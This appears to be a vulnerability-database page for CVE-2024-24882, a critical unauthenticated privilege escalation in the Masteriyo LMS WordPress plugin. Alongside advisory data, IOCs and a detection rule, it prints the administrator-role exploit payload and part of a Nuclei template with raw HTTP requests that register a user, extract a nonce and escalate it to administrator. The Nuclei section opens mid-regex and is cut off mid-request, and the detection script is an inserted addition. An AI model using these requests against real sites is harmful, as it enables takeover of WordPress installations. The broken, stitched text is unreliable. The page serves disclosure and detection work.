CVE-2024-24882
Published 2024-05-17
Priority P1 · 79 · critical · 9.8 · CVSS 3.1
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 2.11% (79.5th percentile)
Incorrect Privilege Assignment vulnerability in masteriyo Masteriyo - LMS learning-management-system. This issue affects Masteriyo - LMS: from n/a through <= 1.7.2.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| masteriyo | masteriyo_lms | <= 1.7.2 | — |
| themegrill | masteriyo | < 1.7.3 | 1.7.3 |
Detection & IOCs (extracted from sources)
url: /account/signup/
url: /wp-json/masteriyo/v1/users/me/?_locale=user
command: {"first_name":"{{uname}}","last_name":"{{uname}}","email":"{{uname}}@gmail.com","role":"administrator","billing":{"state":"No state found"}}
other: "roles":["administrator"]
- Exploit registers a new user via /account/signup/, then sends a POST to /wp-json/masteriyo/v1/users/me/ with role=administrator to escalate privileges; detect unauthenticated or low-privilege REST API calls to this endpoint whose body sets the 'role' field to 'administrator'.
- A successful exploitation returns HTTP 200 with Content-Type application/json and a body containing '"roles":["administrator"]'; monitor REST API responses for unexpected escalation to the administrator role.
- The exploit uses the X-WP-Nonce header extracted from the /account/ page to authenticate the privilege-escalation REST API request; monitor for REST API calls to masteriyo/v1/users/me carrying an X-WP-Nonce from newly registered accounts.
- The registration step uses the hidden field masteriyo-registration=yes; monitor POST requests to /account/signup/ containing this parameter as a precursor to the privilege-escalation attempt.
- The vulnerability affects Masteriyo LMS plugin versions up to and including 1.7.2; ensure patched versions are not flagged.
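The detection notes above can be turned into a small rule over request/response records. The following is an added example, not code from the page or the plugin: it assumes a proxy or WAF that logs method, path, request body, status and response body (the record shape and the sample events are constructed here), and flags the registration precursor, the role=administrator write to the users/me endpoint, and a response confirming the administrator role.

```python
import json
from urllib.parse import urlparse

# Constructed sample records (not real traffic); the field names are an assumption
# about what a body-logging proxy or WAF would emit.
SAMPLE_EVENTS = [
    {"method": "POST", "path": "/account/signup/", "status": 302,
     "req_body": "first-name=alice&username=alice&masteriyo-registration=yes",
     "resp_body": ""},
    {"method": "POST", "path": "/wp-json/masteriyo/v1/users/me/?_locale=user", "status": 200,
     "req_body": '{"first_name":"alice","last_name":"alice","role":"administrator"}',
     "resp_body": '{"id":7,"roles":["administrator"]}'},
    {"method": "POST", "path": "/wp-json/masteriyo/v1/users/me/?_locale=user", "status": 200,
     "req_body": '{"first_name":"bob","last_name":"b"}',
     "resp_body": '{"id":8,"roles":["masteriyo_student"]}'},
]

TARGET_PATH = "/wp-json/masteriyo/v1/users/me"  # endpoint named in the detection notes


def _json(text):
    """Parse a JSON body; non-JSON or empty bodies yield an empty dict."""
    try:
        return json.loads(text) if text else {}
    except ValueError:
        return {}


def classify_event(ev):
    """Return the finding labels that apply to one request/response record."""
    findings = []
    path = urlparse(ev["path"]).path.rstrip("/")  # drop query string and trailing slash
    if ev["method"] == "POST" and path == "/account/signup" \
            and "masteriyo-registration=yes" in ev["req_body"]:
        findings.append("masteriyo_registration")  # precursor, informational
    if ev["method"] == "POST" and path == TARGET_PATH:
        body = _json(ev["req_body"])
        # The profile endpoint should never accept a role change from the caller.
        if body.get("role") == "administrator" or "administrator" in (body.get("roles") or []):
            findings.append("role_escalation_attempt")
        resp = _json(ev["resp_body"])
        if ev["status"] == 200 and "administrator" in (resp.get("roles") or []):
            findings.append("role_escalation_success")
    return findings


def scan(events):
    """Run the rule over all records; returns (index, finding) pairs."""
    return [(i, f) for i, ev in enumerate(events) for f in classify_event(ev)]
```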
CVSS provenance
NVD (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck: 9.8 CRITICAL
GHSA
GHSA-prmv-r26v-qgx9: Improper Privilege Management vulnerability in Masteriyo LMS allows Privilege Escalation
ghsa_unreviewed · 2024-05-17 · CVE-2024-24882 [CRITICAL] CWE-266
Improper Privilege Management vulnerability in Masteriyo LMS allows Privilege Escalation. This issue affects LMS: from n/a through 1.7.2.
VulnCheck
Masteriyo - LMS Plugin Privilege Escalation
vulncheck · 2024 · CVSS 9.8 · CVE-2024-24882 [CRITICAL]
Improper Privilege Management vulnerability in Masteriyo LMS allows Privilege Escalation. This issue affects LMS: from n/a through 1.7.2.
Affected: Masteriyo Masteriyo LMS
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://patchstack.com/database/wordpress/plugin/learning-management-system/vulnerability/wordpress-lms-by-masteriyo-plugin-1-7-2-privilege-escalation-vulnerability
No detection rules found.
Nuclei
Masteriyo LMS <= 1.7.2 - Unauthenticated Privilege Escalation
nuclei · CVSS 9.8 · CVE-2024-24882 [CRITICAL]
Masteriyo LMS ]*?value="([A-Za-z0-9]+)"'
```yaml
        internal: true
  - raw:
      - |
        POST /account/signup/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        remember=true&first-name={{uname}}&last-name={{uname}}&username={{uname}}&email={{uname}}%40gmail.com&password=Test%40123&confirm-password=Test%40123&_wpnonce={{wpnonce}}&_wp_http_referer=%2Faccount%2Fsignup%2F&masteriyo-registration=yes
    redirects: true
  - raw:
      - |
        GET /account/ HTTP/1.1
        Host: {{Hostname}}
    redirects: true
    extractors:
      - type: regex
        name: profile_nonce
        part: body
        group: 1
        regex:
          - '"nonce":"([a-zA-Z0-9]+)"'
        internal: true
  - raw:
      - |
        POST /wp-json/masteriyo/v1/users/me/?_locale=user HTTP/1.1
        Host: {{Hostname}}
        X-WP-Nonce: {{profile_nonce}}
        Content-Type: application/json

        {"first_name":"{{uname}}","last_name":
```
No writeups or analysis indexed.
https://patchstack.com/database/Wordpress/Plugin/learning-management-system/vulnerability/wordpress-lms-by-masteriyo-plugin-1-7-2-privilege-escalation-vulnerability?_s_id=cve
https://patchstack.com/database/vulnerability/learning-management-system/wordpress-lms-by-masteriyo-plugin-1-7-2-privilege-escalation-vulnerability?_s_id=cve
Published 2024-05-17